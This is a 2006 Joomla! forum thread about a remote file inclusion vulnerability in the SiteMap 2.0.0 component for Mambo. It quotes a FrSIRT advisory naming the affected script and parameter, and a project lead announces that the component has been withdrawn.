The Joomla! Forum ™





Post new topic Reply to topic  [ 4 posts ] 
Author Message
PostPosted: Wed Jul 12, 2006 3:10 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Quote:
Author : Matdhule
Contact : matdhule@gmail.com
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
Download : http://mamboxchange.com/frs/download.ph ... emap20.zip


Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Last edited by RobS on Sun Jul 23, 2006 8:06 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Wed Jul 12, 2006 3:55 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
Apperently also joommap 2.05 has this construct (vulnerability yet unconfirmed)

No, everything seems clean in joommap 2.0.5.

I can however confirm the issue with sitemap 2.0.0


Last edited by Anonymous on Wed Jul 12, 2006 4:18 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Fri Jul 14, 2006 12:56 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
and two days after, the official report on secutiry related sites..

Quote:
Advisory ID : FrSIRT/ADV-2006-2803
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-14

Technical Description

A vulnerability has been identified in SiteMap (component for Mambo), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "sitemap.xml.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.

Affected Products

SiteMap (component for Mambo) version 2.0 and prior


http://www.frsirt.com/english/advisories/2006/2803

Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Top
 Profile  
 
PostPosted: Fri Jul 21, 2006 11:58 am 
User avatar
Joomla! Champion
Joomla! Champion

Joined: Fri Aug 12, 2005 12:47 am
Posts: 6569
The sitemap 2.0 component is not actively maintained and should not be used on any production websites ! The component has been removed from mamboforge.

_________________
Johan Janssens - Joomla Co-Founder, Lead Developer of Joomla 1.5

http://www.joomlatools.com - Joomla extensions that just work


Last edited by Jinx on Fri Jul 21, 2006 12:00 pm, edited 1 time in total.

Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 4 posts ] 



Who is online

Users browsing this forum: No registered users and 0 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group